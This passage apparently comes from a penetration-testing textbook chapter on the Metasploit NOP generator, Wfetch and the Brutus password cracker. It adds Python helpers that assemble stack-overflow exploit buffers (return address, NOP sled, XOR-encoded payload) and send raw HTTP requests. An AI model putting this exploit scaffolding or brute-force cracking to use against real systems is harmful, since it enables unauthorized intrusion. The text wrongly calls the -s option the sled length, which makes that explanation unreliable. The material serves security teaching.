    -b <opt>  The list of characters to avoid: '\x00\xff'
    -h        Help banner.
    -s <opt>  The comma separated list of registers to save.
    -t <opt>  The output type: ruby, perl, c, or raw.
To generate a 50-byte NOP sled that is displayed as a C-style buffer, run the following command:

msf > use x86/opty2
msf nop(opty2) > generate -t c 50
unsigned char buf[] =
"\xf5\x3d\x05\x15\xf8\x67\xba\x7d\x08\xd6\x66\x9f\xb8\x2d\xb6"
"\x24\xbe\xb1\x3f\x43\x1d\x93\xb2\x37\x35\x84\xd5\x14\x40\xb4"
"\xb3\x41\xb9\x48\x04\x99\x46\xa9\xb0\xb7\x2f\xfd\x96\x4a\x98"
"\x92\xb5\xd4\x4f\x91";
msf nop(opty2) >

Figure 12.25: Metasploit NOPS Module
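To make concrete what the generate command's -b (bad characters) and -s (NOP sled length) options in the payload and NOP modules above are doing, here is an added Python example; it is not Metasploit's own code. The sled-byte table, the bad_chars, nop_sled, build_buffer and xor_encode helpers, the stack layout (filler, return address, sled, payload) and the sample payload bytes are assumptions made for illustration: opty2 draws from a much larger table of multi-byte instructions than the single-byte list used here, and a real encoder prepends a decoder stub that this example omits.

```python
import secrets
import struct

# Constructed example, not Metasploit's code. Reproduces the idea behind the
# NOP module and the -b / -s options: a sled of harmless single-byte x86
# instructions filtered against bytes the target mangles, placed after the
# overwritten return address and in front of the payload.

# Single-byte x86 instructions that are safe to land in: 0x90 nop,
# 0x40-0x47 inc r32, 0x48-0x4f dec r32. Hypothetical, smaller table than
# the multi-byte one opty2 uses.
SLED_BYTES = [0x90] + list(range(0x40, 0x50))


def bad_chars(spec):
    r"""Parse a '\x00\x0a\x0d' style list, the form the -b option takes."""
    return bytes(int(tok, 16) for tok in spec.split("\\x") if tok)


def has_bad_chars(buf, avoid):
    return any(b in avoid for b in buf)


def nop_sled(length, avoid=b""):
    """Random sled of the given length drawn only from allowed sled bytes."""
    pool = [b for b in SLED_BYTES if b not in avoid]
    if not pool:
        raise ValueError("every sled byte is a bad character")
    return bytes(secrets.choice(pool) for _ in range(length))


def xor_encode(payload, avoid):
    """Pick a single-byte XOR key whose output contains no bad characters.
    This is the core of a simple encoder; a real one prepends a decoder
    stub (itself free of bad characters) that undoes the XOR at run time."""
    for key in range(1, 256):
        if key in avoid:
            continue
        enc = bytes(b ^ key for b in payload)
        if not has_bad_chars(enc, avoid):
            return key, enc
    raise ValueError("no single-byte key avoids all bad characters")


def build_buffer(offset, ret_addr, payload, avoid, sled_len=16):
    """Classic stack layout: `offset` bytes of filler up to the saved
    return address, the address packed little-endian as x86 stores it
    (pointing into the sled), then sled + payload."""
    if has_bad_chars(payload, avoid):
        raise ValueError("payload contains bad characters; encode it first")
    ret = struct.pack("<I", ret_addr)
    if has_bad_chars(ret, avoid):
        raise ValueError("return address contains bad characters")
    return b"A" * offset + ret + nop_sled(sled_len, avoid) + payload


def c_style(buf, per_line=15):
    """Render bytes the way `generate -t c` does."""
    lines = ["".join(f"\\x{b:02x}" for b in buf[i:i + per_line])
             for i in range(0, len(buf), per_line)]
    return "unsigned char buf[] =\n" + "\n".join(f'"{l}"' for l in lines) + ";"
```

The checks in build_buffer are the ones that matter in practice: a null or newline inside the return address or the payload is truncated or mangled by the vulnerable string routine, so the exploit silently fails; running the payload through an encoder first (the -e option) is how Metasploit gets around exactly that.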
Webserver Attack Tools: Wfetch

WFetch allows an attacker to fully customize an HTTP request and send it to a web server to see the raw HTTP request and response data. It lets an attacker test the behavior of web sites that contain new elements such as Active Server Pages (ASP) or wireless protocols.

http://www.microsoft.com

Source: http://www.microsoft.com

Wfetch is a graphical user interface aimed at helping customers resolve problems related to browser interaction with Microsoft's IIS web server. It allows a client to reproduce a problem in a lightweight, very HTTP-friendly test environment, and it allows for very granular testing down to authentication, authorization, custom headers, and much more. The same raw view of what the server sends back (status line, Server header, authentication challenges) is what makes it useful for reconnaissance.
Figure 12.26: Wfetch screenshot (a GET request for / sent to localhost on port 80 with anonymous authentication, and the Log Output pane reporting "Last Status: 500 Internal Server Error" along with the WWWConnect connect and close trace)
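The following Python is an added example, not Wfetch's code, that does in a script what Wfetch does through its GUI: build an HTTP request by hand (verb, path, custom headers), send it over a raw socket and return the unparsed response so the status line and server headers can be read exactly as sent. It starts a throwaway local HTTPServer as a constructed stand-in for the IIS target so that it runs offline; the ConstructedIIS server banner, the /admin path and its 401 challenge are assumptions made for the illustration.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed example, not Wfetch's code. raw_request() hand-builds an HTTP
# request and returns the raw response; _Handler is a throwaway stand-in
# for the target web server so the script runs offline.


class _Handler(BaseHTTPRequestHandler):
    """Constructed target: / answers 200, /admin demands Basic auth,
    anything else 404. The Server header is what a tester reads first."""
    server_version = "ConstructedIIS/1.0"   # constructed banner
    sys_version = ""

    def _reply(self, code, extra=()):
        self.send_response(code)
        for name, value in extra:
            self.send_header(name, value)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        if self.path == "/":
            self._reply(200)
        elif self.path == "/admin":
            self._reply(401, [("WWW-Authenticate", 'Basic realm="admin"')])
        else:
            self._reply(404)

    do_HEAD = do_GET

    def log_message(self, *args):   # keep the console quiet
        pass


def start_target():
    """Serve the stand-in on a random loopback port in a daemon thread."""
    srv = HTTPServer(("127.0.0.1", 0), _Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def raw_request(host, port, verb="GET", path="/", headers=None, timeout=5):
    """Send a hand-built request and return (status_code, headers, raw_bytes).
    Nothing is normalised on the way out, so odd verbs, duplicate headers
    or malformed paths reach the server exactly as written."""
    hdrs = {"Host": f"{host}:{port}", "Connection": "close"}
    hdrs.update(headers or {})
    request = (f"{verb} {path} HTTP/1.1\r\n"
               + "".join(f"{k}: {v}\r\n" for k, v in hdrs.items())
               + "\r\n")
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request.encode())
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    raw = b"".join(chunks)
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    parsed = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        parsed[name.strip().lower()] = value.strip()
    return status, parsed, raw
```

Because the request is assembled as a plain string, it is trivial to change the verb to HEAD (as Brutus does to keep requests cheap), add or drop headers, or send something a browser never would, which is exactly the kind of probing Wfetch was built for.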
Web Password Cracking Tool: Brutus

Source: http://www.hoobie.net

Brutus is a remote password cracking tool. It is available for Windows 9x, NT, and 2000; there is no UNIX version available, although one is a possibility at some point in the future. Brutus was originally written to help check routers for default and common passwords.

Features

• HTTP (Basic Authentication)
• HTTP (HTML Form/CGI)
• POP3
• FTP
• SMB
• Telnet
• Multi-stage authentication engine
• No user name, single user name, and multiple user name modes
• Password list, combo (user/password) list, and configurable brute force modes
• Highly customizable authentication sequences
• Load and resume position
• Import and export custom authentication types as BAD files seamlessly
• SOCKS proxy support for all authentication types
• User and password list generation and manipulation functionality
• HTML form interpretation for HTML Form/CGI authentication types
• Error handling and recovery capability, including resume after crash/failure

Figure 12.27: Brutus screenshot (the same Brutus AET2 session as in Figure 12.20: target 10.0.0.17, HTTP (Basic Auth) on port 80 with the HEAD method, users.txt and words.txt loaded, and admin/academic among the positive authentication results)